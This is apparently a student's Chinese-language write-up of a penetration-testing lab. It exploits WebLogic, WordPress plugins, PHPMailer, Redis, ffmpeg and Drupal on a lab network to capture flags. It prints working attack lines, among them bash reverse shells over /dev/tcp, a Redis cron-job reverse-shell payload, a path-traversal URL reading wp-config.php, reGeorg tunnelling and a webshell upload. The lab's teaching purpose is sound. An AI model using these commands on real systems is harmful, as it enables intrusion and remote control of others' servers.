+++
title = "Ex7"
date = 2022-05-11
categories = ["网络安全实验"]
draft = false
author = "Logic"
+++

## 实验过程 {#实验过程}


### 任务一 {#任务一}

使用nmap扫描192.168.2.10的端口，得到的扫描结果如下

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0513ceB9L9.png" >}}

可见7001端口是开放的，且运行了afs3-callback服务，为了验证是否开放了T3协议和查看WebLogic的版本信息。我们使用如下方式利用nmap进行扫描

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0513FMkH4A.png" >}}

可见开放了T3协议，且WebLogic版本为12.1.3.0。接下来就可以利用反序列化漏洞进行提权。这里要先弄清序列化和反序列化。

> 序列化：Java 序列化是指把 Java 对象转换为字节序列的过程，序列化后的字节数据可以保存在文件、数据库中反序列化：Java 反序列化是指把字节序列恢复为 Java 对象的过程。序列化和反序列化通过ObjectInputStream.readObject()和ObjectOutputStream.writeObject()方法实现。

序列化和反序列化的过程可以用下图表示

![](https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/05130LFy02.jpg)
在Java中反序列化的过程中，攻击者仅能够控制“数据”，而无法控制怎么执行，因此必须借助被攻击应用的具体场景来实现。这里我们可以利用WebLogic中的反序列化漏洞来实现攻击。反序列化漏洞的的利用工具为WebLogic_EXP.jar，我们执行这个工具，连接到192.168.2.10主机上，连接成功。我们尝试cd切换目录，失败，则直接使用find命令查找/home目录下的包含flag内容的文件，结果如下

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/05178x8mJl.png" >}}

可见该文件中应该包含我们需要的内容，查看文件内容得到

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0517YqB1Gj.png" >}}

flag为 `flag6{f67ed0564c9d4055130237cdde2ad486}`


### 任务二 {#任务二}

使用nmap扫描网段192.168.2.0/24，可以得到网段中的存活主机如下

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0517bzrhXM.png" >}}

依次尝试访问各个主机，最终可知192.168.2.11主机下有wordpress，则该主机为我们的目标主机。wordpress有诸多插件，而其中一些插件可能存在漏洞，我们使用wpscan工具扫描wordpress网站。该工具可以给出wordpress网站的诸多信息。运行工具可以看到使用帮助

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0517CYBnQI.png" >}}

故我们先指定wordpress的url对wordpress进行扫描，扫描结果为

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0517jZXVaD.png" >}}

可见使用的服务端软件为apache，还可以看到主题为twentyfifteen，我们使用-e选项对该网站上的插件进行枚举，并使用vp指定只显示有漏洞的插件，扫描结果如下

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0517jkeQnz.png" >}}

可见wp-hide-security-enhancer有安全漏洞，扫描工具给出了漏洞的参考链接

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0517ouKDpX.png" >}}

我们打开参考链接，查看漏洞相关的信息和利用方法。可知利用方法为

> <http://192.168.2.11/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php>

其中file_path指定文件的路径。得到的结果为

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/05171Soi6o.png" >}}

可以得到flag为flag4{358006170b5d31ff0523c1656df7b82e}


### 任务三 {#任务三}

配置好代理，访问wordpress找回密码页面，burpsuite拦截到对应的数据包，发送给repeater，在repeater中的数据包如下

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0518D2LCUi.png" >}}

phpmailer组件是调用linux系统命令sendmail进行邮件发送，命令格式为： `sendmail -t -i -fusername@hostname` 。在漏洞文件class.phpmailer.php中serverHostname函数通过传入的SERVER_NAME参数来获取主机名，该主机名即HTTP请求报文中的host值，但是SERVER_NAME参数并没有经过任何过滤，因此我们可以进行任意构造拼接，从而产生了系统命令注入漏洞。该漏洞利用的自动化脚本为wp.sh，查看该脚本的使用方法。

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/05189SqZ9u.png" >}}

按照使用方法运行脚本，得到的结果如下

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0518oREEfw.png" >}}

得到flag为flag3{452755af28285ffd6615866f61bb23e6}


### 任务四 {#任务四}

查看漏洞利用脚本wordpress-rce-exploit.sh，可知其内容中关键的区别地方在于使用了bash反弹shell

```shell
RCE exec cmd="sleep 3&& /bin/bash -i >& /dev/tcp/$rev _host/7777 0>&1"
```

这段代码的理解如下

-   bash -i打开一个bash进行交互
-   &gt;&amp; 是将标准输出和标准错误输出重定向，&gt;&amp; /dev/tcp/$rev_host/7777就将bash的标准输出和标准错误输出重定向到一个tcp连接中，该tcp连接的目标主机是rev_host，端口号为7777，这样将bash的输出传给了操作机，0&gt;&amp;1则是将标准输入也重定向到标准输出，因为刚才已经将标准输出重定向给了tcp连接，故从tcp传来的命令也会回传给操作机而不会在目标机上显示。

根据代码可知，在rev_host处应该填入操作机的ip地址192.168.2.200，在操作机使用netcat监听7777端口的tcp连接

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0519XEnI70.png" >}}

> nc 全称为 netcat，所做的就是在两台电脑之间建立链接，并返回两个数据流，可运行在 TCP 或者 UDP 模式，添加参数—u 则调整为 udP，默认为 tcp。•	-v 参数，详细输出•	-n 参数，netcat 不要 DNS 反向查询 IP 的域名•	-z 参数，连接成功后立即关闭连接

使用漏洞利用脚本获取反弹shell，如下

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0519blmt9G.png" >}}

则可收到目标机的tcp连接，并可以运行命令

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0519MdQ6B1.png" >}}

查看目标机home目录下存在ﬂag5的文件

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0519BFSJZ9.png" >}}

得到flag为flag5{2591c98b70119fe624898b1e424b5e91}
为了上传tunnel文件，我们在regeorg文件夹中使用python启动一个简单的http服务，这样该文件夹下的所有文件都会成为服务器网站文件的一部分，命令为

```shell
python3 -m http.server
```

根据前面的实验可知，tunnel文件应存放在 /var/www/html/wordpress目录中，故可以用wget将文件下载到该目录

```shell
cd /var/www/html/wordpress/
wget http://192.168.2.11/tunnel.nosocket.php
```

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0519jLynfa.png" >}}

首先按开启代理，执行连接命令为

```shell
python reGeorgSocksProxy.py -p 5555-u http:// 192.168.2.11/tunnel.nosocket.php
```

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0519s4s6jr.png" >}}

在proxychains中修改代理地址, 修改proxychains.conf

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0519dcvDw0.png" >}}

> ProxyChains 是 Linux 和其他 Unix 下的代理工具。它可以使任何程序通过代理上网，允许 TCP 和 DNS 通过代理隧道，支持 HTTP、SOCKS4 和 SOCKS5 类型的代理服务器，并且可配置多个代理。ProxyChains 通过一个用户定义的代理列表强制连接指定的应用程序，直接断开接收方和发送方的连接。ProxyChains 的配置文件位于 /etc/proxychains.conf ，打开后你需要在末尾添加你使用的代理。

接下来扫描 192.168.1.10 网段

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0519iGK8Gn.png" >}}


### 实验五 {#实验五}

扫描任务四得到的192.168.1.x网段中的各个主机的端口，得到其开启的端口服务，结果为

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/051960zmsn.png" >}}

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0519aKlGla.png" >}}

根据扫描结果可知，主机 192.168.1.11 开启了 web（端口号 80）服务和 redis（端口号）6379 服务，因此本机为该任务的目标机。连接redis服务器查看配置文件位置，首先连接192.168.1.11的redis服务器，这里redis允许外连且没有设置密码，可以随意访问。正常情况下可以写入文件，但是尝试过程中发现，必要的 conﬁg 命令被替换了。而 conﬁg 命令的替换一定是写在 redis 的配置文件中的。

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/05197hnS5b.png" >}}

使用info命令查看配置信息：

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0519bCKt6W.png" >}}

则可知配置文件的位置为/etc/redis/63799.conf
在浏览器中访问192.168.1.11

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0519uYbpGT.png" >}}

可知上传文件的路径为192.168.1.11/upload，且由这个页面可知该页面是通过 ffmpeg 处理视频的小应用，只有上传，下载和删除功能，此处存在 ffmpeg 文件读取漏洞，构造特定的 avi 视频，经过 ffmpeg 处理之后的视频就会包含想要的文件内容。利用文件读取漏洞获取 redis 配置文件内容。使用gen_xbin_avi.py生成payload，命令为

```shell
python3 ./gen_xbin_avi.py file://<filename> file_read.avi
//其中的<filename>为我们需要读取的文件的路径，file_read.avi为生成的avi文件
```

访问upload页面，上传我们刚才生成的avi文件conf.avi，上传后网站返回的结果乱码。

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0519VNFqD2.png" >}}

乱码的原因是网页编码不正确，我们修改一下编码，查看乱码的内容是什么，在text encoding中将编码种类修改为Unicode

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0519Q8Hj1C.png" >}}

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0519bMxVGe.png" >}}

根据提示我们将文件名修改为123.avi，再次上传文件

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0519VJ8cdh.png" >}}

可见上传成功，访问download可以看到提示下载一个名为456.avi的文件。我们下载这个文件

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0519GH1FJO.png" >}}

查看文件内容可见config被替换为ccoonnffiigg，这样我们可以用ccoonnffiigg来进行配置，并写入文件。
/var/spool/cron/目录下存放的为以各个用户命名的计划任务文件，root 用户可以修改任意用户的计划任务。dbfilename 设置为 root 为用 root 用户权限执行计划任务。如果目标服务器存在redis 未授权访问，就可以利用任务计划反弹 shell。首先设置数据库备份目录为 linux  计划任务目录，命令为：

```shell
ccoonnffiigg set dir ’/var/spool/cron/’
```

设置备份文件名为 root，以 root 身份执行计划任务，命令为：

```shell
ccoonnffiigg set dbfilename ’root’
```

接下来设置写入的内容，在计划任务前后加入换行以确保写入的计划任务可以被正常解析，命令为：

```shell
set xxx "\n\n\n* * * * * bash -i >& /dev/tcp/192.168.2.200/9999 0>&1\n\n\n"
```

在操作机上执行命令 nc -l -p 9999，监听 9999 端口，得到反弹 shell, 在 redis 的配置文件/etc/redis/63799.conf中获得flag1:

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0519D6WfbY.png" >}}

flag1为flag1{7bed46c5c61c0ac625cebf8a9922cc48}
查看/home/flag目录下的文件，得到flag2为

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0519l4VGzz.png" >}}

flag2为flag2{86a1b907d54bf7010394bf316e183e67}


### 任务六 {#任务六}

使用浏览器结合proxychains访问内网中使用了drupal8的web应用，命令行打开firefox，根据提示可知目标机为192.168.1.10，尝试在浏览器中直接访问

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0520F9mRx6.png" >}}

尝试弱口令登录网站后台，使用用户名admin和密码admin，登陆成功。

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0520a6PNWD.png" >}}

根据CVE-2017-6920漏洞有关的介绍，我们先访问如下链接

> <http://192.168.1.10/admin/config/development/configuration/single/import>

上传drupal_poc.txt的内容，上传之后跳转到phpinfo()界面得到网站信息

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0520aCnOzK.png" >}}

上传drupal_exp.txt的内容

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0520oLH7Qa.png" >}}

上传后访问 192.168.1.10/shell.php，得到

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0520E177Ic.png" >}}

用Cknife设置代理连接webshell获取网站的权限。打开菜刀

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0520GbHd6d.png" >}}

连接到shell.php

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/05203hWtAI.png" >}}

连接成功，查看其中的flag.php，得到flag12

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0520rMBLGA.png" >}}

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0520rIveKL.png" >}}

flag12为flag12{c2ce1971e3a10498a64da8c7f3a70091}
查看home目录下的flag文件，得到flag8

{{< figure src="https://gcore.jsdelivr.net/gh/game-loader/picbase@master/uPic/0520XEahPf.png" >}}

flag8为flag8{d969246731846291b32cd819bf0e7ff6}
